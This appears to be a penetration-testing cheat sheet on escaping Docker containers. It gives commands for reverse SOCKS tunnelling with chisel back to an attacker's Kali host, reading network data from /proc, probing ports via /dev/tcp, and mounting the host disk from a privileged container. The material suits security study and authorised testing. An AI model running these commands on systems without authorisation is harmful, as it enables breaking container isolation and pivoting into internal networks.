Docker Container Escape
Looking For Potential Files
Whenever you are in a docker container, always try to enumerate the system as much as you can, because you will always find something interesting in it.
// Potential Directories where you can find something interesting
/opt
/home
/home/<username>
/tmp
/var/www/html
Doing Reverse Proxy Using Chisel
We can also do reverse proxy using chisel. It will help us in such a way that you want to connect to MySQL or Redis database and you are not having such tools installed on the docker container so you can do a reverse proxy and connect to MySQL or redis using proxychains
//Running Chisel on the Kali Linux First
chisel server --reverse -p 1234 --socks5
// Running Chisel on the docker container
./chisel client <ip of kali linux>:1234 R:socks
// Now you can use proxychains and access the things on docker container
Looking For IP Addresses
Sometimes you cannot run ip a or ifconfig command so you can run the following to obtain the ip address
cat /proc/net/fib_trie // this sometimes shows the ip addresses of different services

Route Information
We can look for routes using below command
cat /proc/net/route

to convert the hexadecimal ip we can use below python script
import sys
def hex_to_ip(hex_str):
# Split the hex string into 4 chunks of 2 characters (octets)
octets = [hex_str[i:i+2] for i in range(0, len(hex_str), 2)]
# Reverse the order of octets for little-endian format
octets.reverse()
# Convert each octet from hex to decimal
ip_octets = [str(int(octet, 16)) for octet in octets]
# Join the decimal octets with dots to form an IP address
ip_address = ".".join(ip_octets)
return ip_address
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python hex_to_ip.py <hex_value>")
sys.exit(1)
hex_value = sys.argv[1]
if len(hex_value) != 8:
print("Error: The hex value should be 8 characters long.")
sys.exit(1)
ip = hex_to_ip(hex_value)
print(f"Converted IP: {ip}")
Command To See Open Port
if you want to see an open port and there is no Nmap or Netcat, you can run the below command
cat < /dev/tcp/172.18.0.1/3306

Automated Tools
Deepce
We can use Deepce tool from the below link to enumerate docker containers for potential escapes
bash deepce.sh

Docker Privileged Mode Enabled
We can escalate our privileges from docker container to host machine if we have privilege mode turned on, in this case we can mount the Host Files and Folders on the Docker Container and access them
mkdir /mnt/host
mount /dev/xvda1 /mnt/host/
cd /mnt/host/
# now you can see the Host OS Files and Folders

Last updated